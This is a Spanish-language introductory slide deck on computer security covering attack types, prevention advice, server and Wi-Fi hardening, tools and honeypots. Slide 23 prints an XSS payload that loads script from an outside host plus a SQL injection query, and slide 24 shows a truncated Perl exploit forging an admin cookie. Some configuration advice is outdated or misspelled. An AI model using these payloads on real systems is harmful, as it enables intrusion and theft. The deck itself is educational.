2. Seguridad Informática:
La seguridad en informática consiste en asegurar que
los recursos del sistema de información, como data,
servicios o programas de una organización, sean
utilizados de la manera que se decidió y que el acceso a
la información allí contenida, así como su modificación,
sólo sea accesible a las personas que se encuentren
acreditadas y dentro de los límites de su autorización.
3. CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
No existe la absoluta seguridad !!
Todo es rompible si se le aplica fuerza. Una caja de
vidrio se puede romper, pero también una caja fuerte
de titanio. ¿Qué es más seguro: la caja de vidrio o la
de titanio?
Evidentemente la de titanio, pero esto depende
solamente de que herramienta utilicemos para
romperla.
Todo se puede vulnerar. La única razón por la cual
utilizamos rejas de fierros en nuestras casas y los
bancos es porque hace que el ataque sea más lento.
4. Debemos enfocarnos en REDUCIR EL RIESGO, y no en
tratar de eliminar las amenazas, ya que es imposible.
Para eso debemos saber de QUE o QUIENES nos
protegemos y también COMO nos atacan.
5. “Si te conoces a ti mismo y
conoces a tu enemigo, entonces
no deberás temer el resultado de
mil batallas”
Sun-Tzu, El Arte de la Guerra
6. ¿De donde surge la seguridad?
• “Tecnológicamente, la seguridad es GRATIS”
– YA HAS PAGADO POR ELLA: Los sistemas
operativos modernos contienen muchas
características de seguridad. ¿Las conoces?¿Las
usas?
– LAS MEJORES HERRAMIENTAS DE SEGURIDAD
SON OPEN SOURCE. (excepto los antivirus)
7. Metas en la seguridad
Integridad: La información sólo puede ser modificada por
quien está autorizado y de manera controlada.
Confidencialidad: La información sólo debe ser legible
para los autorizados.
Disponibilidad: Debe estar disponible cuando se necesita.
Irrefutabilidad (No repudio): El uso y/o modificación
de la información por parte de un usuario debe ser
irrefutable, es decir, que el usuario no puede negar dicha
acción.
8. Componentes de Seguridad
• Seguridad Fisica = Proteger de acceso fisico a
personas no autorizadas.
• Seguridad Operacional = Medidas de seguridad
aplicadas a las operaciones del negocios.(Access
c
control,autenticazion, backups y disaster recovery)
• Seguridad Administrativa = Esta es la parte del
triangulo donde se implementan las guias, reglas y
procedimientos a nivel administrativo.
(
(politicas,requerimientos de software,Etc..)
9. ¿Qué es Vulnerabilidad?
• Un agujero de seguridad es un fallo en un programa que
permite mediante su explotación violar la seguridad de un
sistema informático.
• Una vulnerabilidad por lo general permite que el atacante
pueda engañar a la aplicación, por ejemplo, esquivando los
controles de acceso o ejecutando comandos en el sistema
donde se aloja la aplicación.
• UNO DE LOS BAKDOORS MAS FAMOSOS LOS TUVO WINDOWS XP
Aquí recordaremos aquel agujero de seguridad de Windows
a través de los temporales de internet (2007)
10.
11.
12.
13.
14.
15.
16. Otro ejemplo de vulnerabilidad (no tan
relevante, pero igual interesante)
Con ustedes el buscaminas
17. Factores que hacen a un sistema más
vulnerable
Código sin confirmar - Un código en un diskette, en CD-ROM o
USB, se puede ejecutar por la irresponsabilidad o ignorancia del
usuario.
Defectos - La mayoría de los sistemas contienen errores que se
pueden aprovechar por el malware, mientras no se ponga el
parcho correspondiente.
Homogeneidad - Cuando todas las computadoras en una red
funcionan con el mismo sistema operativo, si pueden corromper
ese SO, podrán afectar cualquier computadora en el que
funcione.
Sobre-privilegios del código - La mayoría de los sistemas
operativos permiten que el código sea ejecutado por un usuario
con todos los derechos.
Sobre-privilegios del usuario - Algunos sistemas permiten que
todos los usuarios modifiquen sus estructuras internas.
19. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Ataques Internos
- Premeditación (Empleados mal intencionados o ex empleados con
información privilegiada)
- Descuido
- Ignorancia
- Indiferencia de las politicas de seguridad
Ataques externos
-- Hackers, Crackers, Lammers, Script-Kiddies
-- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen
test), etc.
20. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Ataques Internos
• Suplantación de identidad
• Sniffing (Incluso administradores pueden hacer sniffing.
Sugerencia: CIFRAR)
• Robo de información (Ej: para la competencia)
• Virus, Troyanos, Gusanos
• Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
Keylogging - Keycatching
Keycatcher:
21. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Ataques Externos
• Ataques contra servicios WEB
• Cross Site Scripting (XSS)
• SQL Injection
• Exploits
• Robo de Identidad
• Denegación de Servicio (DoS) y Denegación de Servicio
Distribuido (DDoS)
• SPAM
• VIRUS
• Phishing (Whishing, Hishing)
• Troyanos
23. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
XSS:
http://docs.info.apple.com/article.html?
artnum=';a=document.createElement('script');a.src='http://h4k.in/i.j
s';document.body.appendChild(a);//';alert(1)//%22;alert(2)//
%22;alert(3)//--%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT
TOP 1 login_name FROM admin_login--
24. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Ejemplo de un exploit en PERL:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name>n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-
info.ml","Cookie","USER_ID=0; path=/;");
$t = $resp->content;
#print $t;
";
25. Algo breve sobre Cookies
Las cookies son pequeños archivos de texto que el navegador almacena
en el ordenador del usuario, cuando se visitan páginas Web.
• Las cookies almacenan información que se utiliza con varios fines:
• Para personalizar la página Web y su navegación para cada usuario.
• Para recoger información demográfica sobre cuántos usuarios visitan la
página y su tiempo de estancia en ella.
• Para realizar un seguimiento de qué banners se muestran al usuario, y
durante cuánto tiempo.
• Estos usos no tienen un carácter malicioso, al menos en principio. Sin
embargo, es necesario tener en cuenta que toda información personal que
se introduzca en una página Web se puede almacenar en una cookie,
incluyendo el número de la tarjeta de crédito.
• Además, las cookies también se pueden utilizar para formar un perfil del
usuario, con información que éste no controla, y que después puede ser
enviada a terceros, con la consiguiente amenaza para la privacidad.
26. Y ya hablamos de exploit, hablemos de:
El Script boy o Script Kiddie
Definición. Persona que presume de ser un hacker o cracker sin que posea un grado
de conocimientos suficientes. Usa normalmente cracks, exploits y programas
similares construidos por personas con grandes conocimientos pero cuyo uso está al
alcance de cualquiera.
Para ahora recordar los exploits, como antaño
36. Esta fue una de las maneras más usadas para obtener la contraseña de
otra persona de las muchas maneras que se pueden usar como:
KEYLOGERS programas que capturan todo lo que se hace por el teclado
O algunas personas aprovechan las vulnerabilidades de Windows y los
Agujeros de seguridad para obtener la ansiada contraseña por ejemplo
Desencriptar el registro de Windows para abrir un cookie
37. Brevemente:
Los Keylogger
Programa que intercepta todas las pulsaciones
realizadas en el teclado (e incluso a veces también
el Mouse), y las guarda en un archivo para obtener
datos sensibles como contraseñas, etc. Este archivo
puede ser enviado por un troyano a un usuario de
PC, vía mail, chat o descargando un archivo exe.
38. Brevemente:
El Spyware
• Los programas espía, también conocidos como spyware, son aplicaciones
informáticas que recopilan información personal del usuario sin su
consentimiento, como por ejemplo software presente en el ordenador, hábitos
de uso de Internet, páginas visitadas, etc. Posteriormente, transmiten esta
información a terceros, tales como empresas de publicidad u otras
compañías interesadas en dichos datos, con la consiguiente violación de la
privacidad.
• Los programas espía llegan al ordenador a través de distintas vías:
mediante un troyano, que los instala sin consentimiento del usuario; cuando se
visita una página Web que incluye determinados controles ActiveX o código
que explota una determinada vulnerabilidad.
• Además de las acciones descritas, el spyware tiene una serie de efectos
colaterales: consume recursos del sistema, ralentiza el funcionamiento del
ordenador, causa fallos en el sistema, etc.
39. Y más brevemente:
Los backdoors
• (Puerta trasera) Defecto en un software o página Web que
permite ingresar a una determinada parte de los mismos
que usualmente está restringida a un usuario ajeno. No
siempre es un defecto (bug), también puede ser una entrada
secreta de los programadores o webmasters con diversos
fines. Ej.: una página Web tiene clave de acceso para
ingresar, pero existe una determinada dirección que nos
permite entrar saltando la misma. Uno de los más usados es
Back Orifice creado específicamente para entrar en
sistemas operativos Windows usando troyanos.
40. Y super breve:
El Phishing
• El phishing consiste en el envío de correos
electrónicos que, aparentando provenir de
fuentes fiables (por ejemplo, entidades bancarias),
intentan obtener datos confidenciales del
usuario. Para ello, suelen incluir un enlace que, al
ser pulsado, lleva a páginas Web falsificadas. De esta
manera, el usuario, creyendo estar en un sitio de toda
confianza, introduce la información solicitada que, en
realidad, va a parar a manos del estafador.
41. En este ejemplo, el propio correo incluye un formulario en lugar de ofrecer un enlace a
una página falsa. Si el usuario introduce sus datos y envía el formulario, estos son
finalmente recogidos en un servidor ubicado en Taiwán.
42. Y QUE HAY DEL SPAM
72% del correo electrónico mundial es Spam
Fuente:Ironport, 2010.
Objetivos:
▪ Ganar Notoriedad
• Dañar empresas internacionales
• Recolectar datos (ratware, pictionary, spiders, crawlers)
• Cometer delitos (spoofing, pishing, etc.)
• Publicidad pagada por el usuarios y a costo mínimo para el emisor
Beneficios:
• De tipo económico
* Contratados por empresas
* Venta de datos
• Reconocimiento
¿POR QUÉ EXISTE?
ES UN NEGOCIO QUE GENERA PUBLICIDAD Y BENEFICIOS ECONÓMICOS CASI SIN
COSTO
¡¡¡¡UN SPAMMER PUEDE GANAR 8000 USD POR DÍA!!!!
Fuente: Reporte Resultados Reunión Busan, Task Force on Spam OECD, Septiembre 2010.
43. CONSECUENCIAS DEL SPAM
GENERA IMPORTANTES COSTOS
• Daña la productividad
• Daña la competitividad de las empresas
* Tiempo de entrega y respuesta
* Confiabilidad
Uso inútil de banda ancha
Daño a la infraestructura informática Denegación servicio por saturación
Transmisión de virus y gusanos
• Juicios
Pérdida de recursos por los que paga (saturación)
A Usuarios Paga publicidad que no solicito
Pérdida de información por combate (sobrefiltrado)
Traslado de costos de combate por ISPs
Costos por Ancho de Banda
A ISPs Costos por inversión en herramientas para su combate
Costos en imagen
IMPLICACIÓN DEL SPAM EN LAS TELECOMUNICACIONES
Existe un daño con respecto a la operación segura de las redes públicas de telecomunicaciones y al uso
eficiente de su capacidad y recursos para su mejor aprovechamiento, logrando servicios de
telecomunicaciones de calidad, en beneficio de los usuarios
44. PREVENCIÓN
•No abras y elimina todo mensaje cuyo título o emisor (personas o empresas)
te resulte sospechoso o desconocido;
•Sé cuidadoso al abrir los archivos adjuntos, pueden contener virus que se
activan al abrirlos;
•Instala un firewall y un antivirus. Actualízalos frecuentemente;
•Instala un filtro de Spam o suscríbete al de tu prestador de servicios de
internet;
•Utiliza diversas direcciones de correo, por ejemplo, una cuenta de trabajo y
una cuenta personal solo para mensajes a personas confiables y conocidas;
•Si te es solicitada información confidencial mediante mensaje aparente de tu
banco o compañía crediticia, verifica su veracidad por teléfono.
•Si envías mensajes a un gran número de destinatarios, usa el campo de copia ciega BCC, de esta forma las direcciones no
son visibles a otros;
•Usa un programa de encriptación para tus mensajes, así aseguras que el contenido sólo sea visto por el destinatario;
•No compres, ni respondas a mensajes comerciales de empresas dudosas. No respondas solicitando tu eliminación de la
lista, con ello aseguras al spammer la validez de tu cuenta de correo, lo que llevará a que aparezca en más listas y bases
de datos;
•No respondas a cadenas o a reportes de falso virus (hoax), ni atiendas a sus solicitudes de reenvío. Estos reportes te
impulsan a tomar supuestas medidas contra el virus, que en realidad te llevarán a provocar daños a tu equipo;
•Verifica siempre la necesidad e identifica la identidad real del destinatario cuando proporciones tu información confidencial
vía Internet o e-mail;
•Considera siempre a quién proporcionas tus datos de contacto, tales como dirección de correo electrónico o número
celular, previniendo quién podría tener acceso a él después.
46. LOS MANDAMIENTOS MAS IMPORTANTES
DE SEGURIDAD
Siempre respetar las políticas de seguridad
Siempre tener nuestros servicios actualizados a la última versión
conocida estable
Utilizar mecanismos de criptografía para almacenar y transmitir
datos sensibles
Cambiar las claves cada cierto tiempo
Auto-auditar nuestros propios servicios. Autoatacarnos para saber
si somos o no vulnerables
Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”.
No dejar respaldos con información sensible en directorios web
No usar las mismas claves para servicios distintos (ej, la clave de
root sea la misma que la de MySQL)
47. SERVICIOS DE INTERNET
- Cambiar los puertos por defecto
- Garantizar el acceso solo a cuentas específicas
- Aplicar técnicas de Hardening
- Para servicios privados y confidenciales utilizar túneles seguros (VPN
cifradas) en Internet y redes no seguras
- Eliminar todos los banners posibles y sobre todo las versiones
- Habilitar módulos de seguridad (Ej mod_security en Apache)
- Levantar Firewalls e IDS/IPS
- Crear cuentas de sistema restringidas (aunque no tengan privilegios)
48. SERVICIOS DE INTERNET
- Nunca trabajar con ”root” si no es estrictamente necesario
- Proteger con doble contraseña si es posible
- Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y
caracteres especiales. Las claves no deben ser palabras coherentes (ej: Admin25)
- Cerrar puertos y eliminar aplicaciones innecesarias
- Borrar robots.txt y estadísticas públicas
- Proteger las URL (ej: mod_rewrite)
49. SERVICIOS DE INTERNET
- Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:
index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola de
chancho)”
- Realizar respaldos periódicamente y probar que funcionen
- Conocer las técnicas de ataque más conocidas
- Auditar los códigos con herramientas de seguridad
- Si ejecutan algún servidor de base de datos, permitir solamente comunicación con
interfaz loopback y no dejar sin contraseña las bases de datos.
- En lo posible no utilizar servicios como:
- WEBMIN
- phpMyAdmin
- Interfaces WEB en routers o dispositivos de red
50. UN POCO MAS DE SEGURIDAD CON APACHE Y PHP
Apache. En httpd.conf activar las siguientes directivas:
ServerTokens Prod
ServerSignature Off
ServerAdmin <direccion@decorreo.com>
habilitar mod_security y mod_rewrite
PHP .En php.ini
php_expose=off
“esconde php”
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.
evitar scripts con phpinfo();
56. PROTECCIÓN DE REDES WI-FI
EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN
EXTENSIÓN FÍSICA (No hay cables) LO QUE CONLLEVA A QUE
SEA MÁS FÁCIL ACCEDER A ELLAS REMOTAMENTE
EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR
PARA REDUCIR EL RIESGO DE ATAQUES.
57. PROTECCIÓN DE REDES WI-FI
Apagar el router o access point cuando no se ocupe
Nunca entregar la clave Wi-Fi a terceros
Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peor
de los casos WEP (128 y 64 bits)
Habilitar el control de acceso por MAC. Son fáciles de clonar pero pone
una barrera más
Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH,
etc)
Deshabilitar el acceso inalámbrico a la configuración
Cambiar los puertos por defecto de los servicios necesarios en el router
(ej: http a 1000)
Desactivar el broadcasting SSID
Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos poco
convencionales. (Ej: 90.0.10.0 – 90.0.10.254)
Usar VPN si fuese posible.
58. PROTECCIÓN DE REDES WI-FI
Cambiar regularmente las claves Wi-Fi (tanto administración como
clave de red).
Guardar bien las claves de administración
Usar contraseñas complicadas. (Ej: E_aR@_1-x
No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonos
inalámbricos
Realizar un scaneo local de las redes disponibles para evitar
interferencias.
LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
62. Scanners de vulnerabilidades
• Esto es una herramienta que permite escanear
una computadora en una red para
vulnerabilidades ya conocidas.
• Estas vulnerabilidades pueden ser tanto en la
red como en el sistema operativo y en
aplicaciones.
• Ej: Nessus,GFI LANguard,Retina,Sara.
64. Password Cracker
• Es el proceso de recuperar el password de data
almacenada y/o transmitida por una
computadora o dispositivo electrónico.
• Vectores de ataques: Encripción debil,
Adivinar, Ataques por diccionarios,Fuerza
Bruta (Brute Force).
• Ej. Cain and Abel, John the Ripper,THC Hydra y
L0phtcrack.
66. Packet sniffer
• Esto es una herramienta que permite capturar
los paquetes de datas que son transmitidos en
una red.
• Estos tambien se utilizan en conjunto a
password crakers.
• Ej.Wireshark, Kismet ,Tcpdump,Ettercap y Cain
and Abel.
68. Spoofing attacks
• En esta situación el atacante logra fingir ser un
servidor o un equipo o una aplicación para
lograr que sus victimas se comuniquen con el y
no con el destinatario real.
• Man-in-the-middle attack y URL spoofing
dsniff,Karma,AirJack,Ettercap y Cain and Abel.
70. Y para mayor INSEGURIDAD: Google
Hacking
¿Qué es el Google Hacking? Ejemplos
• Muchos de ustedes se preguntaran qué es eso del Google
Hacking?? Es bien sencillo. El Google Hacking consiste en
explotar la gran capacidad de almacenamiento de información
de Google, buscando información específica que ha sido
añadida a las bases de datos del buscador. Si las búsquedas las
orientamos a ciertas palabras clave que nos ayuden a
encontrar información sensible, puntos de entrada sensibles a
posibles ataques, o cualquier otro tipo de información que
tuviera carácter de sensibilidad, estaremos ejecutando un
Google hack. Resumiendo: Google Hacking es buscar en
Google información sensible, generalmente, con fines
maliciosos.
77. Google Hacking
• Mediante esta técnica, es posible encontrar información sobre :
– Productos vulnerables
– Mensajes de error
– Ficheros que contienen información sensible
– Ficheros que contienen claves
– Ficheros que contienen nombres de usuario
– Footholds e información de apoyo al acceso
– Páginas con formularios de acceso
– Páginas que contienen datos relativos a vulnerabilidades
– Directorios sensibles
– Información sensible sobre comercio y banca electrónica
– Dispositivos hardware online
– Ficheros vulnerables
– Servidores vulnerables
– Detección de servidores web
79. Google Hacking
¿Cómo impedir ser víctimas de Google Hacks?
1. Aprenda cómo funciona Google. Conozca y
experimente las posibilidades de la búsqueda
avanzada. Entienda que las búsquedas son muy
refinables y que es un motor de búsqueda muy
poderoso, que no sólo está pensado para ordenar y
encontrar páginas web, sino que también pueden
hallarse documentos ofimáticos, informes, faxes,
memorandos, notas, fotografías, teléfonos … es
decir, absolutamente todo lo que sea accesible
puede acabar en las bases de datos de Google.
80. Google Hacking
¿Cómo impedir ser víctimas de Google Hacks?
1. Una vez entendido el punto primero,
entienda que igual que podemos usar Google
para hallar documentos inocuos, podemos
emplearlo para obtener documentos con
datos sensibles. Grábeselo en la cabeza. Hay
gente que vive de este tipo de técnicas y de
la información que extrae de ellas.
81. Google Hacking
¿Cómo impedir ser víctimas de Google Hacks?
1. Si dispone de página web, asegúrese de
comprender lo importante que es tener un fichero
de robots.txt correctamente configurado. Tener una
página web es algo más que colocar fotos y
documentos en la Red para que las vean los
amiguetes. Nuevamente incidimos en que todo lo
que se coloca en servidores Web es susceptible de
acabar siendo indexado en las bases de datos de
Google. Esto es aplicable para cualquier objeto
accesible desde documentos Web: cámaras web,
impresoras, etc.
82. Google Hacking
¿Cómo impedir ser víctimas de Google Hacks?
• No deje de consultar los parámetros que definen el
mecanismo de posicionamiento de resultados en
Google. Aplique “posicionamiento inverso” a todo
aquello que quiera mantener lejos de ojos ajenos.
Puestos a aparecer, mejor aparecer en el puesto
doscientos que en el quinto. No está de más usar el
buscador para aprender cómo funciona el Google
hacking y aplicar técnicas de inversión aplicadas a su
caso.
83. Google Hacking
¿Cómo impedir ser víctimas de Google Hacks?
• Si usted tiene un buen nivel técnico y administra
máquinas corporativas, quizás debería plantearse no
sólo la revisión de las políticas de exclusión de robots,
sino además, debería probar un honeypot
especializado. Le proponemos Google Hack
Honeypot. Funciona muy bien y le brindará
información interesante sobre Google hackers que
intenten explotar en sus sitios Web este tipo de
técnicas
2. Sería recomendable también que leyera documentos
con ideas sobre este honeypot, en caso de que opte
por emplearlo.
84. Google Hacking
• Que es un Honeypot??
– Se denomina Honeypot al software o conjunto de
computadores cuya intención es atraer a crackers o
spammers, simulando ser sistemas vulnerables o débiles a
los ataques. Es una herramienta de seguridad informática
utilizada para recoger información sobre los atacantes y sus
técnicas. Los Honeypots pueden distraer a los atacantes de
las máquinas más importantes del sistema, y advertir
rápidamente al administrador del sistema de un ataque,
además de permitir un examen en profundidad del
atacante, durante y después del ataque al honeypot.
85. Google Hacking
Honeypot
• Algunos honeypots son programas que se limitan a
simular sistemas operativos no existentes en la
realidad y se les conoce como honeypots de baja
interacción y son usados fundamentalmente como
medida de seguridad. Otros sin embargo trabajan
sobre sistemas operativos reales y son capaces de
reunir mucha más información; sus fines suelen ser de
investigación y se los conoce como honeypots de alta
interacción.
86. Google Hacking
Honeypot
• Un tipo especial de honeypot de baja interacción son
los sticky honeypots ( honeypots pegajosos) cuya
misión fundamental es la de reducir la velocidad de
los ataques automatizados y los rastreos.
• En el grupo de los honeypot de alta interacción nos
encontramos también con los honeynet.
• También se llama honeypot a un website o sala de
chat, que se ha creado para descubrir a otro tipo de
usuarios con intenciones criminales,
87. PARA REFLEXIONAR
• NOS HEMOS PUESTO A PENSAR QUE
PODEROSO ES GOOGLE – Y QUE
IMPRESCINDIBLE EN NUESTRA VIDA WEB.
• MICROSOFT ES UN GIGANTE, PERO EN LA RED
EL QUE MANDA ES GOOGLE.
• Y LA INTERROGANTE ES: ¿HASTA DONDE
LLEGARA GOOGLE? ¿CUANTO
DEPENDEREMOS DE EL EN UN FUTURO?
88. Tema aparte: los Crackers
Aquí algunos Famosos
Fred Cohen Robert Tappan
Morris
Kevin David Mitnick
Chen Ing- Hou
(maestro)
89. Herramientas usadas por los crackers
• Las herramientas de cracking son los programas y
aplicaciones que ayudan al cracker a lograr su fin,
aunque estos programas no necesariamente
debieron estar diseñados para ese fin específico.
• Categorías:
– Desensamblador
– Ensamblador
– Depurador (debugger)
– Editor hexadecimal
– Compilador
90. Herramientas usadas por los crackers
• Desensamblador
– Un desensamblador es un programa de computación que
traduce desde lenguaje máquina (código binario) al
lenguaje de programación (assembler).
– El programa desensamblador a utilizar, por trabajar con
lenguaje máquina y ensamblador, depende
exclusivamente del microprocesador que estamos usando
(para que pueda reconocer las instrucciones del código
binario), de la arquitectura de la máquina y del sistema
operativo en uso (no es lo mismo Windows que Linux).
91. Herramientas usadas por los crackers
• Ensamblador
– El término ensamblador (del inglés assembler) se refiere a un
tipo de programa informático que se encarga de traducir un
fichero fuente escrito en un lenguaje ensamblador, a un
fichero objeto que contiene código máquina, ejecutable
directamente por la máquina para la que se ha generado. El
propósito para el que se crearon este tipo de aplicaciones es
la de facilitar la escritura de programas, ya que escribir
directamente en código binario, que es el único código
entendible por la computadora, es en la práctica imposible. La
evolución de los lenguajes de programación a partir del
lenguaje ensamblador originó también la evolución de este
programa ensamblador hacia lo que se conoce como
programa compilador.
92. Herramientas usadas por los crackers
• Depurador
• Un depurador (en inglés, debugger), es un programa
que permite depurar o limpiar de errores otro
programa informático.
• Ejemplos de depuradores:
– GNU Debugger (gdb)
– SoftICE
– OllyDbg
– Trw2000
– Ida Pro
93. Herramientas usadas por los crackers
• Editor hexadecimal
• Un editor hexadecimal (o editor de archivos binarios) es un tipo de programa de
ordenador que permite a un usuario modificar archivos binarios. Los editores
hexadecimales fueron diseñados para editar sectores de datos de disquetes o
discos duros por lo que a veces se llaman "editores de sectores".
• Utilizando un editor hexadecimal un usuario puede ver o puede redactar el
contenido intacto y exacto de un archivo al contrario que con la interpretación del
mismo contenido que otro, de nivel más alto software de aplicaciones puede
asociar por la extensión de archivo. Por ejemplo, los datos intactos de la imagen
(los raws), y la manera de interpretar el mismo archivo del software de edición de
imágenes.
• En la mayoría de los editores hexadecimales los datos del archivo son
representados como valores hexadecimales agrupados en dos grupos de 8 bytes y
un grupo de 16 caracteres ASCII, los caracteres no reconocidos son representados
normalmente por un punto "." en ASCII.
• El estándar comando Unix shell es usado para mostrar (aunque no editar) un
archivo en hexadecimal y octal es od.
95. Herramientas usadas por los crackers
• Compilador
– Un compilador es un programa que, a su vez, traduce un
programa escrito en un lenguaje de programación a otro
lenguaje de programación, generando un programa
equivalente. Usualmente el segundo lenguaje es código
máquina, pero también puede ser simplemente texto. Este
proceso de traducción se conoce como compilación.
– La razón principal para querer usar un compilador es querer
traducir un programa de un lenguaje de alto nivel, a otro
lenguaje de nivel inferior (típicamente lenguaje máquina). De
esta manera un programador puede diseñar un programa en
un lenguaje mucho más cercano a como piensa un ser humano,
para luego compilarlo a un programa más manejable por una
computadora.
97. Cyber Terrorismo
Es un término controversial
Definición mayormente aceptada = Es el
uso predeterminado de actividades
perjudiciales o amenazas a sistemas de
computadoras o networks con la
intención de causar daño o avanzar su
causa política, sociales, religiosa o
ideológica.
98. Cyber Warfare
Cyber Warfare = Es el uso de
computadoras y el internet para conducir
guerra o guerrillas en el cyberespacio.
Cyber Guerrero = Individuo alta mente
versado en las áreas de: programación,
seguridad informática, redes, espionage y
computer forensics. Gobiernos, Ejércitos y
agencias de la ley están entrenando en
grandes cantidades a sus miembros en
estas áreas.
99. PARA TENER SIEMPRE EN CUENTA…
• Que no todos los ataques o problemas de
seguridad son sofisticados, a veces son meros
engaños simples (“viveza” o “criollada” acá en
Perú), como la llamada Ingeniería Social (un
término más bonito, o como dicen “más cool”,
o mejor dicho más técnico)
100. Pero definitivamente lo más dramático
• Es recordar que la seguridad de TI no sólo se
puede y debe reducir a un ámbito
empresarial, sino que también debe incluir el
ámbito social colectivo, pues
lamentablemente las TI son tan poderosas
que pueden ser usadas tanto para hacer lo
correcto, como lo incorrecto y hasta lo más
indignante como la Pornografía Infantil y la
Trata de Personas.
• Veamos las dos caras del uso de las TI
102. • Cerca del 80% de los ‘ataques’ provienen del interior.
• No se notifican todos los ataques que se reciben.
• Muchos accidentes humanos se reportan como ataques.
• No es eficiente hacer una alta inversión puntual y olvidarse durante un
tiempo.
103. • La seguridad es un proceso, un camino continuo.
• Se tiene que diferenciar de lo que hay que protegerse.
Errores involuntarios. (Maquinaria y personal)
Ataques voluntarios. (Internos y externos)
Desastres naturales.